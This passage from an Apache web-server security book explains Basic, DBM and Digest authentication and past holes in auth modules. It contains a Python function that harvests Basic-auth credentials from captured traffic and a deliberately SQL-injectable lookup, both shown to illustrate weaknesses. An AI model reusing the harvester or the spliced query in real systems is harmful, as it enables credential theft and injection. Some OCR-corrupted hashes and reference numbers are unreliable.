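            token = line.split(None, 2)[2].strip()
            decoded = base64.b64decode(token).decode("latin-1")
            user, _, password = decoded.partition(":")  # only the first ':' separates
            return user, password
    return None


def harvest(capture):
    """Run sniff_credentials over every request in a captured TCP stream."""
    found = []
    for chunk in capture.split(b"\r\n\r\n"):
        creds = sniff_credentials(chunk)
        if creds:
            found.append(creds)
    return found
```

The same header travels with every subsequent request to the protected area, not just the first, so a sniffer sitting on the path for a few minutes collects the credentials of every active user; the only defence is to keep the header out of the clear by running the exchange over SSL.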





Yet another problem with simple HTTP authentication (other than its weakness to 
electronic eavesdropping) is that it’s only suitable for small ACLs. For more than, say, 
500 users, it’s inefficient. To deal with larger lists, consider using DBM file-based 
authentication. 


DBM File-Based Authentication: Introducing mod_auth_dbm 


Apache includes mod_auth_dbm for DBM-file—based authentication, which you'll find 
in httpd-release/modules/aaa as mod_auth_dbm.c. 


mod_auth_dbm.c, in Apache 2.0.28, consists of 355 lines before includes. In these 355 
lines, mod_auth_dbm establishes an authentication mechanism that offers user identi- 
fication by username/password pairs in DBM files. 


Note that three kinds of DB files exist: Berkeley DB-2, NDBM, and GDBM. 
mod_auth_dbm deals with NDBM files, as we’ll discuss in the next few sections. 
However, we’ll also cover Berkeley DB-2 files (via mod_auth_db) later in this chapter. 


GDBM files, by the way, are GNU-style DB files. GNU dbm (gdbm) is a database func- 
tion library that uses extendible hashing and works similarly to the standard dbm. 
Programmers can use gdbm to create and manipulate a hashed database. 


The datum structure that gdbm (like ndbm) uses to pass keys and values is 

typedef struct { 
    char *dptr; 
    int dsize; 
} datum; 
GDBM key/data pairs reside in a gdbm disk file or gdbm database. gdbm allows an appli- 
cation to open multiple databases simultaneously. When an application opens a 
gdbm, it is either a reader or writer. Only one writer at a time can open a designated 
database, but multiple readers, on the other hand, can simultaneously open the 
same database. To learn more about gdbm, go here: 

http://theory.uwinnipeg.ca/localfiles/infofiles/gdbm.html. 


For most situations, though, you’ll use either DBM or Berkeley-style DB-2 files, so 
we'll focus on those. 


DBM Authentication: A Brief Tour of mod_auth_dbm 


mod_auth_dbm employs several functions; internal functions, data type declarations, 
and structures that taken together, perform the relevant work in asking for, examin- 
ing, and either verifying or rejecting user authorization requests: 


e The ndbm.h include 

e create_dbm_auth_dir_config() 
e command_rec dbm_auth_cmds[ ] 
e get_dbm_pw() 

e get_dbm_grp() 


e dbm_authenticate_basic_user() 


As you can see from the previous list, mod_auth_dbm works much like mod_auth, 
taking essentially the same steps but accommodating the DBM structure. 
Let's run through it. 


The ndbm.h Include 

ndbm.h doesn’t ship with Apache, but is instead a standard Unix include file. 
Depending on your system’s configuration, you'll find it in one of several places. 
Two popular locations are 


e /usr/include/gdbm/ndbm.h 


e /usr/include/db1/ndbm.h 


ndbm.h looks like this: 


/* 
 * Copyright (c) 1990, 1993 
 *      The Regents of the University of California.  All rights reserved. 
 * 
 * This code is derived from software contributed to Berkeley by 
 * Margo Seltzer. 
 * 
 *      @(#)ndbm.h      8.1 (Berkeley) 6/2/93 
 */ 

#ifndef _NDBM_H 
#define _NDBM_H 1 
#include <db.h> 

/* Map dbm interface onto db(3). */ 
#define DBM_RDONLY      O_RDONLY 

/* Flags to dbm_store(). */ 
#define DBM_INSERT      0 
#define DBM_REPLACE     1 

/* 
 * The db(3) support for ndbm(3) always appends this suffix to the 
 * file name to avoid overwriting the user's original database. 
 */ 
#define DBM_SUFFIX      ".db" 

typedef struct { 
        char *dptr; 
        int dsize; 
} datum; 

typedef DB DBM; 
#define dbm_pagfno(a)   DBM_PAGFNO_NOT_AVAILABLE 

__BEGI_DECLS_PLACEHOLDER_REMOVED


Two constants are possible store_method arguments to dbm_store(): 
e DBM_INSERT—Insertion of new entries only 


e DBM_REPLACE—Allow replacing existing entries 


Functions are 
e int dbm_clearerr(DBM *); 
e void dbm_close(DBM *); 
e int dbm_delete(DBM *, datum); 
e int dbm_error(DBM *); 
e datum dbm_fetch(DBM *, datum); 
e datum dbm_firstkey(DBM *); 
e datum dbm_nextkey(DBM *); 
e DBM *dbm_open(const char *, int, mode_t); 


e int dbm_store(DBM *, datum, datum, int); 


mod_auth_dbm includes ndbm.h on line 86. It then sets some data structures, including 
the password file, group file, and finally, a dbmauthoritative flag: 


typedef struct { 
    char *auth_dbmpwfile; 
    char *auth_dbmgrpfile; 
    int auth_dbmauthoritative; 
} dbm_auth_config_rec; 


create_dbm_auth_dir_config() sets all the defaults for the session, including setting 
the password and group files to NULL, and the auth_dbmauthoritative flag to TRUE: 
static void *create_dbm_auth_dir_config(apr_pool_t *p, char *d) 
{ 
    dbm_auth_config_rec *conf = apr_pcalloc(p, sizeof(*conf)); 
    conf->auth_dbmpwfile = NULL; 
    conf->auth_dbmgrpfile = NULL; 
    conf->auth_dbmauthoritative = 1; 
    return conf; 
} 


Next, command_rec dbm_auth_cmds[] fills in a command_rec: 


static const command_rec dbm_auth_cmds[] = 
{ 
    AP_INIT_TAKE1("AuthDBMUserFile", ap_set_file_slot, 
                  (void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmpwfile), 
                  OR_AUTHCFG, "dbm database file containing user IDs and passwords"), 
    AP_INIT_TAKE1("AuthDBMGroupFile", ap_set_file_slot, 
                  (void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmgrpfile), 
                  OR_AUTHCFG, "dbm database file containing group names and member user IDs"), 
    AP_INIT_TAKE12("AuthUserFile", set_dbm_slot, 
                   (void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmpwfile), 
                   OR_AUTHCFG, NULL), 
    AP_INIT_TAKE12("AuthGroupFile", set_dbm_slot, 
                   (void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmgrpfile), 
                   OR_AUTHCFG, NULL), 
    AP_INIT_FLAG("AuthDBMAuthoritative", ap_set_flag_slot, 
                 (void *) APR_XtOffsetOf(dbm_auth_config_rec, auth_dbmauthoritative), 
                 OR_AUTHCFG, "Set to 'no' to allow access control to be passed along " 
                 "to lower modules, if the UserID is not known in this module"), 
    {NULL} 
}; 


get_dbm_pw() gets the password: 


static char *get_dbm_pw(request_rec *r, char *user, char *auth_dbmpwfile) 
{ 
    DBM *f; 
    datum d, q; 
    char *pw = NULL; 
#ifdef AP_AUTH_DBM_USE_APR 
    apr_status_t retval; 
#endif 
    q.dptr = user; 
#ifndef NETSCAPE_DBM_COMPAT 
    q.dsize = strlen(q.dptr); 
#else 
    q.dsize = strlen(q.dptr) + 1; 
#endif 

#ifdef AP_AUTH_DBM_USE_APR 
    if (!(retval = dbm_open(&f, auth_dbmpwfile, APR_DBM_READONLY, 
                            APR_OS_DEFAULT, r->pool))) { 
        ap_log_rerror(APLOG_MARK, APLOG_ERR, retval, r, 
                      "could not open sdbm auth file: %s", auth_dbmpwfile); 
        return NULL; 
    } 
    if (dbm_fetch(f, q, &d) == APR_SUCCESS) 
        /* sorry for the obscurity ... falls through to the 
         * if (d.dptr) { block ... 
         */ 
#else 
    if (!(f = dbm_open(auth_dbmpwfile, O_RDONLY, 0664))) { 
        ap_log_rerror(APLOG_MARK, APLOG_ERR, errno, r, 
                      "could not open dbm auth file: %s", auth_dbmpwfile); 
        return NULL; 
    } 
    d = dbm_fetch(f, q); 
#endif 
    if (d.dptr) { 
        pw = apr_palloc(r->pool, d.dsize + 1); 
        strncpy(pw, d.dptr, d.dsize); 
        pw[d.dsize] = '\0';             /* Terminate the string */ 
    } 
    dbm_close(f); 
    return pw; 
} 
get_dbm_grp() gets the group information. It reuses get_dbm_pw() to fetch the 
record and then carves out the text between the first and second colons: 


static char *get_dbm_grp(request_rec *r, char *user, char *auth_dbmgrpfile) 
{ 
    char *grp_data = get_dbm_pw(r, user, auth_dbmgrpfile); 
    char *grp_colon; 
    char *grp_colon2; 

    if (grp_data == NULL) 
        return NULL; 
    if ((grp_colon = strchr(grp_data, ':')) != NULL) { 
        grp_colon2 = strchr(++grp_colon, ':'); 
        if (grp_colon2) 
            *grp_colon2 = '\0'; 
        return grp_colon; 
    } 
    return grp_data; 
} 


Next, dbm_authenticate_basic_user() does the basic user authentication (which 
might not necessarily grant the user access to all directories): 


static int dbm_authenticate_basic_user(request_rec *r) 
{ 
    dbm_auth_config_rec *conf = ap_get_module_config(r->per_dir_config, 
                                                     &auth_dbm_module); 
    const char *sent_pw; 
    char *real_pw, *colon_pw; 
    apr_status_t invalid_pw; 
    int res; 

    if ((res = ap_get_basic_auth_pw(r, &sent_pw))) 
        return res; 

    if (!conf->auth_dbmpwfile) 
        return DECLINED; 

    if (!(real_pw = get_dbm_pw(r, r->user, conf->auth_dbmpwfile))) { 
        if (!(conf->auth_dbmauthoritative)) 
            return DECLINED; 
        ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                      "DBM user %s not found: %s", r->user, r->filename); 
        ap_note_basic_auth_failure(r); 
        return HTTP_UNAUTHORIZED; 
    } 
    /* Password is up to first : if exists */ 
    colon_pw = strchr(real_pw, ':'); 
    if (colon_pw) { 
        *colon_pw = '\0'; 
    } 
    invalid_pw = apr_password_validate(sent_pw, real_pw); 
    if (invalid_pw != APR_SUCCESS) { 
        ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                      "DBM user %s: authentication failure for \"%s\": " 
                      "Password Mismatch", 
                      r->user, r->uri); 
        ap_note_basic_auth_failure(r); 
        return HTTP_UNAUTHORIZED; 
    } 
    return OK; 
} 





Managing DBM Files: dbmmanage 


dbmmanage is a utility for creating and updating DBM format files that store user- 
names and passwords for HTTP Basic authentication. Table 11.2 summarizes 
dbmmanage's syntax and options. 


TABLE 11.2 dbmmanage Options 





Tool Description 

add Adds a username entry to the DBM file. 

adduser Gets a password and adds an entry (username/password). 

check Gets a password and checks if the specified username is in the DBM database. 

delete Gives the specified username the boot. 

filename The DBM filename. 

import Reads username/password pairs (colon-delimited) from STDIN and adds them to 
the database. (Be sure that you shotgun only those records where the password 
is already crypted, such as those that come from a standard, Basic authentica- 
tion .htpasswd file). 

update Like adduser but ensures that the specified username already exists. 

username The specified username. 

view This dumps the DMB file’s contents to STDOUT. 
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The syntax is 


dbmmanage filename [command] [username] [passwd] 


Using DBM Authentication 


The chief benefit of DBM-based authentication is its speed. Plain-text storage is okay 
if you have, say, only 100 users. However, if you have thousands, Apache must 
traverse all that data procedurally and thus, it will move slowly. Therefore, because 
speed is often critical (users are notoriously impatient) DBM-style storage is 
preferable. 


DBM schemes use a simple but effective system: They base their search on a 
key/value pair, split the key (username) and password into parts, and therefore create 
two files. For example, if your database name was myusers, it would create two files: 

• myusers.pag 

• myusers.dir 


To use the DBM system, though, you must first load the module. To do so, uncomment 
this line in httpd.conf: 


# Module dbm_auth_module mod_auth_dbm.o 


After you do, restart Apache. 
Next, issue the following command (substituting your desired values): 


dbmmanage /db-directory/myusers adduser hacker slour7*UN 


Here, dbmmanage creates the database myusers in whatever directory you specify (in 
this case, /db-directory/) and adds a user with the username hacker and the 
password slour7*UN. 


NOTE 

Note that dbmmanage might not be in a directory in your default path. In most distributions, 
it’s in /usr/bin/dbmmanage, but on your system, it could be somewhere else. If you get a 
command not found, try looking for it (where, whereis, and so on). 


Then, add the following information to your access file: 


AuthName "Restricted Area" 
AuthType Basic 
AuthDBMUserFile /db-directory/myusers 
require valid-user 
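The lookup that get_dbm_grp() and dbm_authenticate_basic_user() perform can be traced in a few lines of Python. This is an added example, not code from the book or from Apache: a dictionary stands in for the DBM file, the record layout (password:groups:comment) is the one dbmmanage writes, and the {SHA} password scheme used for the constructed entries is one of the formats apr_password_validate() accepts. 

```python
import base64
import hashlib

# Return values named after the ones mod_auth_dbm hands back to Apache.
OK, DECLINED, HTTP_UNAUTHORIZED = "OK", "DECLINED", "HTTP_UNAUTHORIZED"


def sha_password(plain):
    """Produce an {SHA} entry, base64(SHA-1(password)), as dbmmanage/htpasswd
    can write it and as apr_password_validate() accepts it."""
    digest = hashlib.sha1(plain.encode()).digest()
    return "{SHA}" + base64.b64encode(digest).decode()


def password_validate(sent_pw, stored):
    """Stand-in for apr_password_validate(), {SHA} scheme only."""
    if not stored.startswith("{SHA}"):
        raise ValueError("unsupported hash scheme in stored record")
    return sha_password(sent_pw) == stored


def get_dbm_pw(db, user):
    """get_dbm_pw(): fetch the raw record for a username, or None."""
    return db.get(user)


def dbm_password(record):
    """Password is up to the first ':' if one exists."""
    return record.split(":", 1)[0]


def get_dbm_grp(record):
    """Mirror of get_dbm_grp(): the field between the first and second colon;
    a record with no colon at all is returned whole (the group file may be a
    separate DBM whose values are just the group list)."""
    fields = record.split(":")
    if len(fields) < 2:
        return record
    return fields[1]


def dbm_authenticate_basic_user(db, user, sent_pw, authoritative=True):
    """Mirror of dbm_authenticate_basic_user(): unknown users are declined to
    other auth modules unless AuthDBMAuthoritative is on; a wrong password is
    always a 401."""
    record = get_dbm_pw(db, user)
    if record is None:
        return HTTP_UNAUTHORIZED if authoritative else DECLINED
    if not password_validate(sent_pw, dbm_password(record)):
        return HTTP_UNAUTHORIZED
    return OK


# Constructed sample DBM contents: key = username, value = password:groups:comment.
SAMPLE_DB = {
    "nicole": sha_password("slour7*UN") + ":staff,editors:Nicole",
    "guest": sha_password("guest"),          # no groups, no colon at all
}
```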
HTTP and Cryptographic Authentication 


Currently, above and beyond Basic and DBM-type authentication, Apache supports 
digest-based cryptographic authentication using MD5. MD5 belongs to a family of 
one-way hash functions called message digest algorithms and was originally defined in 
RFC 1321: 


The algorithm [MD5] takes as input a message of arbitrary length and produces as output a 
128-bit “fingerprint” or “message digest” of the input. It is conjectured that it is 
computationally infeasible to produce two messages having the same message digest, or to 
produce any message having a given prespecified target message digest. The MD5 algorithm 
is intended for digital signature applications, where a large file must be “compressed” in 
a secure manner before being encrypted with a private (secret) key under a public-key 
cryptosystem such as RSA. 


NOTE 
RFC 1321 is located at ftp://ftp.isi.edu/in-notes/rfc1321.txt. 


MD5 has been most often used to ascertain file integrity (or whether someone has 
tampered with files). When you run a file through MD5, the fingerprint emerges as a 
128-bit value, conventionally written as 32 hexadecimal characters, like this: 


2d50b2bffb537cc4e637dd1f07a187f4 


Many Unix software distribution sites use MD5 to generate digital fingerprints for 
their distributions. As you browse their directories, you can examine the original 
digital fingerprint of each file. A typical directory listing would look like this: 


MD5 (wn-1.17.8.tar.gz) = 2f52aaddidefedadSbad91da8efc0f980 
MD5 (wn-1.17.7.tar.gz) = b92916d83377b143360f068df6d8116 
MD5 (wn-1.17.6.tar.gz) = 18d02b9f24a49dee239a78ecfaf9cbfa 
MD5 (wn-1.17.5.tar.gz) = Ocf8f8d0145bb7678abcc518fOcb39e9 
MD5 (wn-1.17.4.tar.gz) = 4afe7c522ebe0377269da0c7f26ef6b8 
MD5 (wn-1.17.3.tar.gz) = aaf3c2b1c4eaa3ebb37e8227e3327856 
MD5 (wn-1.17.2.tar.gz) = 9b29eaa366d4f4dc6de6489e1e844fb9 
MD5 (wn-1.17.1.tar.gz) = 91759da54792Ff1cab743a034542107d0 
MD5 (wn-1.17.0.tar.gz) = 32f6eb7f69b4bdc64a163bf744923b41 


If you download a file from such a server and later determine that the digital 
fingerprint differs from its reported original, something is amiss. 


Because MD5 offers high assurance, developers have incorporated it into many 
network applications. (MD5 authentication over HTTP has actually been available 
since NCSA httpd was the prevailing Web server.) Let’s look at MD5 digest 
authentication now. 


Adding MD5 Digest Authentication 


You can add MD5 authentication using the htdigest tool. htdigest works in a 
similar fashion as htpasswd. To create a new digest database (.htdigest) issue the 
following command: 


htdigest -c .htdigest [realm] [username] 


NOTE 

The realm variable is your AuthName from .htpasswd. 


Next, edit .htaccess and specify .htdigest’s location: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthDigestFile /home/Nicole/public_html/.htdigest 
AuthName Nicole 
AuthType Basic 

<Limit GET POST> 
require user nicole 
</Limit> 


And finally, specify the new authentication type: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthDigestFile /home/Nicole/public_html/.htdigest 
AuthName Nicole 
AuthType Digest 

<Limit GET POST> 
require user nicole 
</Limit> 


After you complete these steps, all further authentications will be digest-based. This 
will at least ensure that even if attackers come armed with sniffers, they won’t be 
able to harvest any passwords. 
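An added example (not from the book) covering both uses of MD5 in this section: checking a download against a published "MD5 (file) = digest" listing, and what htdigest stores versus what crosses the wire. The Basic header is decodable by anyone holding a packet capture; the Digest response (shown here in its RFC 2069 form, without qop, which is what the realm/nonce scheme above amounts to) is a hash bound to the server's nonce. The tarball bytes, listing and nonce values are constructed. 

```python
import base64
import hashlib
import re


def md5_hex(data):
    """Hex MD5 digest of bytes or str: the 32-character fingerprint."""
    if isinstance(data, str):
        data = data.encode()
    return hashlib.md5(data).hexdigest()


# --- File fingerprints ---------------------------------------------------

LISTING_LINE = re.compile(r"^MD5 \((?P<name>[^)]+)\) = (?P<digest>[0-9a-fA-F]{32})$")


def parse_fingerprints(listing):
    """Turn 'MD5 (file) = digest' lines, as published on distribution sites,
    into a {filename: digest} table; malformed lines are skipped."""
    table = {}
    for line in listing.splitlines():
        m = LISTING_LINE.match(line.strip())
        if m:
            table[m.group("name")] = m.group("digest").lower()
    return table


def download_matches(listing, name, content):
    """True only if the downloaded bytes hash to the published fingerprint."""
    return parse_fingerprints(listing).get(name) == md5_hex(content)


# Constructed stand-in for a downloaded tarball and the site's listing line.
SAMPLE_TARBALL = b"constructed tarball bytes, not a real wn release"
SAMPLE_LISTING = "MD5 (wn-1.17.8.tar.gz) = " + md5_hex(SAMPLE_TARBALL) + "\n"


# --- Basic versus Digest on the wire --------------------------------------

def basic_authorization(user, password):
    """What a browser sends for AuthType Basic: reversible base64."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def sniffed_basic_password(header):
    """A sniffer recovers the Basic password with a single decode."""
    return base64.b64decode(header.split(" ", 1)[1]).decode().split(":", 1)[1]


def htdigest_entry(user, realm, password):
    """The line htdigest writes: user:realm:MD5(user:realm:password).
    Only this hash (HA1) is stored on the server, never the password."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")
    return f"{user}:{realm}:{ha1}"


def digest_response(ha1, method, uri, nonce):
    """Digest response the browser sends (RFC 2069 form, no qop):
    MD5(HA1:nonce:HA2) where HA2 = MD5(method:uri)."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def server_verifies(entry, method, uri, nonce, client_response):
    """Server side: recompute from the stored HA1 and compare. A response
    captured by a sniffer is useless once the server issues a new nonce."""
    _user, _realm, ha1 = entry.split(":")
    return digest_response(ha1, method, uri, nonce) == client_response
```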
NOTE 

One drawback of MD5 authentication is that not every client supports it. However, this is a 
minor concern because though more than 50 eclectic browsers exist, most users stick to 
mainstream products. 


SSL-Based Authentication 


If you want even further assurance, you might consider SSL-based authentication. 
This is where you issue SSL client certificates to your users. They, in turn, install 
these in their browser (the procedure differs depending on the browser type). 


Other Tools for Extending Apache’s Authentication 


Perhaps you prefer methods other than those Apache natively provides. No problem; 
many other types exist. Table 11.3 lists quite a few. 


TABLE 11.3 Tools to Extend Apache's Authentication Schemes 

Tool                    Description 

auth_ip                 This module from Tullio Andreatta provides user authentication by 
                        client IP address. Get it here: 
                        http://www.troppoavanti.it//modules/mod_auth_ip/mod_auth_ip.html. 

auth_ldap               This module from Dave Carrigan (which requires Netscape SDK or 
                        OpenLDAP) provides LDAP-based authentication. Get it here: 
                        http://www.rudedog.org/auth_ldap/. 

auth_oracle_module      This module from Serg Oskin provides authentication for Apache 1.3, 
                        Oracle8 (it requires the Oracle8 client). Get it here: 
                        http://www.macomnet.ru/~oskin/mod_auth_oracle.html. 

inst_auth_module        From Clifford Wolf, this GPL module provides instant-password 
                        authentication. Get it here: 
                        http://ww.clifford.at/stuff/mod_auth_inst.c. 

Kerberos Authentication From Daniel Henninger, this suite (which requires Kerberos 4 or 5 
                        libraries) does Kerberos authentication for mutual tkt or 
                        principal/passwd. Get it here: 
                        http://stonecold.unity.ncsu.edu/software/mod_auth_kerb/. 

MD5 Cookie              This tool from Heinz Richter provides authentication via Realms for 
                        document tree and fast login for users using MD5 signed cookies. Get 
                        it here: http://www.frogdot.org. 

mod_auth_external       This module from Nathan Neulinger authenticates using a user-provided 
                        function/script (secure authentication from Unix). Get it at 
                        http://www.unixpapa.com/mod_auth_external.html. 

mod_auth_mysql          This module from Vivek Khera (which requires Apache 1.3.4+ and MySQL 
                        3.23+) provides MySQL authentication (works with DSO). Get it here: 
                        ftp://ftp.kciLink.com/pub/. 

mod_auth_nds            This module from Philip R. Wilson (which requires Linux and ncpfs) 
                        provides NDS authentication through Apache. Get it here: 
                        http://www.users.drew.edu/~pwilson. 

mod_auth_notes          This module from Guillermo Payet (which requires Lotus Notes) does 
                        user authentication with Notes. Get it here: 
                        http://www.ocean-group.com/download.html. 

mod_auth_nt             From Alvydas Gelzinis, this module does Windows NT (Win32) 
                        authentication via NT users and groups. Get it here: 
                        http://ww.kada.lt/alv/apache/mod_auth_nt. 

mod_auth_ora7           This module from Ben Reser (which requires Oracle 7 and Apache 
                        1.2+) provides authentication through an Oracle database. Get it here: 
                        http://ben.reser.org/mod_auth_ora/. 

mod_auth_ora8           This module from Ben Reser (which requires Oracle 8 and Apache 
                        1.3+) provides authentication through an Oracle database. Get it here: 
                        http://ben.reser.org/mod_auth_ora/. 

mod_auth_oracle/win32   This module from Karsten Pawlik and Serg Oskin (which requires 
                        Oracle 8 and Apache 1.3.x+) provides authentication against an 
                        Oracle8.x.x-Database—for Apache 1.3.x with and without mod_ssl 
                        (for Win32 only). Get it here: 
                        http://www.designlab.de/service_support/downloads/downloads/mod_auth_oracle.zip. 

mod_auth_radius         This module from Alan DeKok and Jan Wedekind provides RADIUS 
                        authentication (Redundant Servers, Directory config). Get it here: 
                        http://www.wede.de/sw/mod_auth_radius/. 

mod_auth_radius         This module from Alan DeKok provides RADIUS authentication. Get it 
                        here: http://www.freeradius.org/mod_auth_radius/. 

mod_auth_samba          From Juha Ylitalo, this module (which requires pam_smb) provides 
                        Samba authentication. Get it at 
                        http://sourceforge.net/projects/modauthsamba/. 

mod_auth_sys            This module from Franz Vinzenz (which requires Apache 1.0+) 
                        provides Basic authentication using system accounts. Get it here: 
                        http://www.ntb.ch/Pubs/mod_auth_sys.c. 

mod_auth_tacacs         This module from Roman Volkoff provides TACACS+ authentication. 
                        Get it here: http://sourceforge.net/projects/mod-auth-tacacs/. 

mod_auth_tds            This module from Ian C. Charnas (which requires the FreeTDS library) 
                        provides TDS authentication (works with MSSQL and Sybase). Get it 
                        at http://freshmeat.net/projects/mod_auth_tds/?topic_id=250. 

mod_auth_yp             This module from Ian Prideaux offers authentication via yellow pages 
                        (NIS). Get it here: 
                        http://ww.amtrak.co.uk/ApacheModules/mod_auth_yp.c. 

mod_bakery              This module from Michael Link (which requires MySQL) does 
                        encrypted cookie access checking and user personalization and 
                        authentication. (Good name, right?) Get it here: 
                        http://www.fractal.net/mod_bakery.tm. 

mod_LDAPauth            This module from Piet Ruyssinck (which requires LDAP libraries and 
                        includes) provides authentication through user information stored in 
                        an LDAP directory. Get it at 
                        http://diamond.rug.ac.be/mod_LDAPauth/index.shtml. 

mod_ntlm                This module from Andreas Gal (which requires Apache 1.3.x+) 
                        provides NTLM authentication for Apache/Unix. Get it here: 
                        http://modntlm.sourceforge.net/. 

mod_secureid            This module from Patrick Asty (which requires Apache 1.3.x+) provides 
                        SecurID authentication through Apache. Get it here: 
                        http://www.deny-all.com/mod_securid/. 

mod_ticket              This module from Justin Wells (which requires Apache 1.3+) provides 
                        authentication via digitally signed tickets at the base of a URL 
                        (session/cookie data) and allows passing authenticated traffic from site 
                        to site. Get it here: http://germ.semiotek.com/ticket. 

PAM Auth                This module from Ingo Lütkebohle (which requires libpam) offers 
                        authentication for Pluggable Authentication Modules. Get it here: 
                        http://pam.sourceforge.net/mod_auth_pam/. 





Holes in Apache Authentication: Historical Perspective 


Holes in Apache-based authentication modules sometimes crop up, and by 
highlighting a few here, I hope to impart the types of problems that can develop. This 
will clue you in on what to watch for when you use third-party modules. 


Before we start, however, note that not every hole is really a hole per se, but rather 
some stem from Web administrators expecting more from modules than those 
modules can actually do. This was the case with our first example. 


On or about November 7, 2001, David Endler reported a flaw in mod_user_track. 
mod_user_track provides tracking of user preferences and behavior through cookies. 
The problem was that session IDs generated by mod_user_track consisted of a 
client’s IP, the system time, and the server PID; hence, these values weren’t random, 
and anyone could generate them or use them to impersonate other users. The easy 
solution was simply not to build applications that rely on these values. 


NOTE 

To learn more about this problem, how attackers could exploit it, and its bottom-line 
significance, check out Endler’s paper “Brute-Forcing Web Session IDs.” Get it here: 
http://www.idefense.com/papers.html. 


A more “pure” hole emerged in September 2001, in mod_auth_oracle. As Florian 
Weimer of RUS-CERT (University of Stuttgart) demonstrated, mod_auth_oracle, an 
authentication module from Serg Oskin that offers database-based authentication 
using Oracle, had a serious flaw. Affected versions (0.5.1 with Apache and various 
Oracle versions, including 8 and 9) allowed remote attackers to send SQL commands 
and, in limited circumstances, alter tables. 


The problem arose because the module didn’t account for attackers inserting escape 
strings. That is, attackers could send additional commands within queries by 
preceding them with a semicolon and a single quote. Weimer developed a temporary 
solution that nicely highlights how the problem arose. His document is titled “Escaping 
Strings in SQL Queries.” Get it at 
http://cert.uni-stuttgart.de/doc/postgresql/escape/. 


NOTE 

Florian also identified similar weaknesses in mod_auth_pgsql, mod_auth_pgsql_sys, 
mod_auth_pg, and mod_auth_mysql. Read his paper on those vulnerabilities here: 
http://cert.uni-stuttgart.de/advisories/apache_auth.php. 
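The mechanism behind the mod_auth_oracle and mod_auth_pgsql findings, as an added illustration rather than code from any of those modules: a user lookup that pastes the username into the query text, beside the bind-parameter form that keeps input out of the SQL entirely (an alternative to escaping it). The same flaw that makes a legitimate apostrophe break the query is what lets a crafted quote or semicolon rewrite it. SQLite stands in for the Oracle back end, and the table contents are constructed. 

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for an auth module's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('nicole', 'slour7*UN')")
    conn.execute("INSERT INTO users VALUES ('o''neil', 'secret')")   # legitimate apostrophe
    conn.commit()
    return conn


def lookup_unsafe(conn, username):
    """The vulnerable pattern: the username is spliced into the query text, so
    quotes and semicolons in it are parsed as SQL, not compared as data."""
    sql = "SELECT password FROM users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn, username):
    """Bind parameter: the driver ships the username as a value, so the query
    structure is fixed before any user input is seen."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


def lookup_outcome(lookup, conn, username):
    """Run a lookup and report what the database saw: the stored value, no row,
    or a parse error, which means the input reached the SQL parser as syntax."""
    try:
        return lookup(conn, username)
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return "SQL error: " + exc.__class__.__name__
```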





mod_auth_digest also manifested a bug wherein when a query string appears in the 
URI (with JSP, for example) the module chokes and reports a bad request. To learn 
more about that, see Apache bug report #7603, located here: 
http://bugs.apache.org/index.cgi/full/7063. 


Summary 


At this stage, after adding authorized users, your system should be fairly secure 
(notwithstanding SSL, which we'll look at in Chapter 15) and thus, you'll next want 
to add functionality. Chances are, this will involve some form of custom program- 
ming. The next two chapters deal with programming from a security perspective. 


12 Hacking Secure Code: Apache at Server Side 


IN THIS CHAPTER 

• Apache Language Support 
• What Is Server-Side Programming? 
• General CGI Security Issues 
• Spawning Shells 
• Buffer Overruns 
• Paths, Directories, and Files 
• PHP 
• Interesting Security Programming and Testing Tools 
• Other Online Resources 


Even if you deploy Apache’s best security features and incorporate authentication, 
attackers can still breach your security. Perhaps the most prevalent mistakes 
Webmasters make today are not in how they configure Apache, but instead in common 
programming errors on the server side (or errors hiding in third-party packages 
located on the server side). This chapter looks at those issues. 


Apache Language Support 


Apache doesn’t explicitly support any particular language 
other than C, which Apache itself is written in, at least not 
in the conventional sense. Rather, it supports Common 
Gateway Interface (CGI) and related types of program- 
ming. These come in many flavors, APIs, and technologies. 


Here are a few: 

• ASP 
• awk 
• BASIC (yes, BASIC) 
• C 
• C++ 
• COBOLScript (don’t laugh) 
• ColdFusion 
• Flash 
• ISAPI 
• Java 
• JSP 
• Perl 
• PHP 
• Python 
• Tcl 
• The shells (ash, bash, zsh, csh, tcsh, ksh, and so on) 
• XML 


Through native functions/modules or third-party modules, Apache supports these 
technologies and many more. Your choices, therefore, are limited only by your 
technological skill and your imagination’s confines. 


What Is Server-Side Programming? 


Server-side programming is a fifty-cent term that describes the authoring and use of 
code that resides on and is executed by the server. You design such code expressly to 
execute on Apache’s signal and return data (if it in fact returns data) to a Web client. 


Search engines, mailing lists, discussion boards, application servers, and many other 
systems rely on server-side programming. However, to be fair, those same systems 
typically support at least nominal client-side code, too, chiefly through JavaScript, 
Jscript, and VBScript. 


Server-side programming most often involves Web-to-database and database-to-Web 
interaction of some kind, and frequently deploys several technologies in concert. 


Some typical combinations: 

• C, C++, or ASP to ISAPI to SQLServer 
• JSP to Oracle App Server to Oracle 
• Perl through DBI to a SQL server 
• PHP to Apache to MySQL 


NOTE 

Any of the aforementioned combinations might also involve client-side JavaScript, Jscript, or 
VBScript for display purposes, or to catch and carry variables (an unadvisable practice, but 
something folks frequently do). 


For our purposes here, these methods fall under the sweeping category of CGI. 


General CGI Security Issues 


On every Web development project, you’ll face three chief risks, and these risks 
manifest in logical sequence, from your project’s beginnings to its ultimate 
completion: 


• Faulty tools—You must keep up with the times and obtain the latest tools. 
